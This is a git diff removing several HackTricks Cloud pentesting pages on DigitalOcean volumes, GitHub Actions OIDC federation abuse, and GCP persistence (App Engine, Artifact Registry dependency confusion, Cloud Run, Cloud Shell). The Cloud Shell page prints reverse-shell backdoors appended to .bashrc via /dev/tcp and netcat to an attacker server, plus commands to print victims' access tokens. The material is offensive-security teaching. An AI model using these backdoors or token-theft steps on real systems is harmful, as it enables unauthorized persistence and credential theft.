-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md deleted file mode 100644 index ce5d000ad..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md +++ /dev/null @@ -1,41 +0,0 @@ -# DO - Volumes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups. - -### Enumeration - -``` -compute volume list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md deleted file mode 100644 index 0f902f914..000000000 --- a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md +++ /dev/null @@ -1,181 +0,0 @@ -# GCP - Federation Abuse - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## OIDC - Github Actions Abuse - -### GCP - -In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed: - -* **Create the Service Account** to access from github actions with the **desired permissions:** - -```bash -projectId=FIXME -gcloud config set project $projectId - -# Create the Service Account -gcloud iam service-accounts create "github-demo-sa" -saId="github-demo-sa@${projectId}.iam.gserviceaccount.com" - -# Enable the IAM Credentials API -gcloud services enable iamcredentials.googleapis.com - -# Give permissions to SA - -gcloud projects add-iam-policy-binding $projectId \ - --member="serviceAccount:$saId" \ - --role="roles/iam.securityReviewer" -``` - -* Generate a **new workload identity pool**: - -```bash -# Create a Workload Identity Pool -poolName=wi-pool - -gcloud iam workload-identity-pools create $poolName \ - --location global \ - --display-name $poolName - -poolId=$(gcloud iam workload-identity-pools describe $poolName \ - --location global \ - --format='get(name)') -``` - -* Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario): - -```bash -attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization) - -gcloud iam workload-identity-pools providers create-oidc $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --display-name $poolName \ - --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \ - --issuer-uri "https://token.actions.githubusercontent.com" - -providerId=$(gcloud iam workload-identity-pools providers describe $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --format='get(name)') -``` - -* Finally, **allow the principal** from the provider to use a service principal: - -```bash -gitHubRepoName="repo-org/repo-name" -gcloud iam service-accounts add-iam-policy-binding $saId \ - --role "roles/iam.workloadIdentityUser" \ - --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}" -``` - -{% hint style="warning" %} -Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used). - -However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard: -{% endhint %} - -
# Create a Workload Identity Pool
-poolName=wi-pool2
-
-gcloud iam workload-identity-pools create $poolName \
-  --location global \
-  --display-name $poolName
-
-poolId=$(gcloud iam workload-identity-pools describe $poolName \
-  --location global \
-  --format='get(name)')
-
-gcloud iam workload-identity-pools providers create-oidc $poolName \
-  --project="${projectId}" \
-  --location="global" \
-  --workload-identity-pool="$poolName" \
-  --display-name="Demo provider" \
-  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
-  --issuer-uri="https://token.actions.githubusercontent.com"
-
-providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
-  --location global \
-  --workload-identity-pool $poolName \
-  --format='get(name)')
-
-# CHECK THE WILDCARD
-gcloud iam service-accounts add-iam-policy-binding "${saId}" \
-  --project="${projectId}" \
-  --role="roles/iam.workloadIdentityUser" \
-  --member="principalSet://iam.googleapis.com/${poolId}/*"
-
- -{% hint style="warning" %} -In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\ -It should be always something like this: - -`attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` -{% endhint %} - -### Github - -Remember to change **`${providerId}`** and **`${saId}`** for their respective values: - -```yaml -name: Check GCP action -on: - workflow_dispatch: - pull_request: - branches: - - main - -permissions: - id-token: write - -jobs: - Get_OIDC_ID_token: - runs-on: ubuntu-latest - steps: - - id: 'auth' - name: 'Authenticate to GCP' - uses: 'google-github-actions/auth@v2.1.3' - with: - create_credentials_file: 'true' - workload_identity_provider: '${providerId}' # In the providerId, the numerical project ID (12 digit number) should be used - service_account: '${saId}' # instead of the alphanumeric project ID. ex: - activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider' - - id: 'gcloud' - name: 'gcloud' - run: |- - gcloud config set project - gcloud config set account '${saId}' - gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}" - gcloud auth list - gcloud projects list - gcloud secrets list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md deleted file mode 100644 index d94452728..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - API Keys Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### Create new / Access existing ones - -Check how to do this in: - -{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md deleted file mode 100644 index ef9829d83..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - App Engine Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Engine - -For more information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### Modify code - -If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence. - -### Old version persistence - -**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md deleted file mode 100644 index 234708928..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md +++ /dev/null @@ -1,67 +0,0 @@ -# GCP - Artifact Registry Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -* What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both? - * The one with the **highest priority set in the virtual repository** is used - * If the **priority is the same**: - * If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used - * If not, the **highest version** is used - -{% hint style="danger" %} -Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority -{% endhint %} - -This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version. - -For persistence these are the steps you need to follow: - -* **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used. -* Create a remote repository if it doesn't exist -* Add the remote repository to the virtual repository -* Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\ - Run something like: - * [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file) -* Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours! - -For more information about dependency confusion check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/dependency-confusion" %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md deleted file mode 100644 index 6aa03016c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - BigQuery Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## BigQuery - -For more information about BigQuery check: - -{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %} -[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md) -{% endcontent-ref %} - -### Grant further access - -Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page: - -{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %} -[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md deleted file mode 100644 index 193e168de..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Cloud Functions Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -For more info about Cloud Functions check: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Persistence Techniques - -* **Modify the code** of the Cloud Function, even just the `requirements.txt` -* **Allow anyone** to call a vulnerable Cloud Function or a backdoor one -* **Trigger** a Cloud Function when something happens to infect something - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md deleted file mode 100644 index 909237bdd..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - Cloud Run Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Backdoored Revision - -Create a new backdoored revision of a Run Service and split some traffic to it. - -### Publicly Accessible Service - -Make a Service publicly accessible - -### Backdoored Service or Job - -Create a backdoored Service or Job - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md deleted file mode 100644 index 5f7960285..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md +++ /dev/null @@ -1,98 +0,0 @@ -# GCP - Cloud Shell Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Shell - -For more information check: - -{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %} -[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md) -{% endcontent-ref %} - -### Persistent Backdoor - -[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. - -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. - -This console has some interesting capabilities for attackers: - -1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org). -2. Said instance will **maintain its home directory for at least 120 days** if no activity happens. -3. There is **no capabilities for an organisation to monitor** the activity of that instance. - -This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing: - -{% code overflow="wrap" %} -```bash -echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc -``` -{% endcode %} - -There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell: - -```bash -#!/bin/sh -apt-get install netcat -y -nc 443 -e /bin/bash -``` - -{% hint style="warning" %} -It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used. -{% endhint %} - -This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session: - -
- -However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**: - -```bash -gcloud auth print-access-token -gcloud auth application-default print-access-token -``` - -#### How the SSH connection is stablished - -Basically, these 3 API calls are used: - -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell) - -But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) - -## References - -* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) -* [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) -* [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md deleted file mode 100644 index 1cfe2f833..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Cloud SQL Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
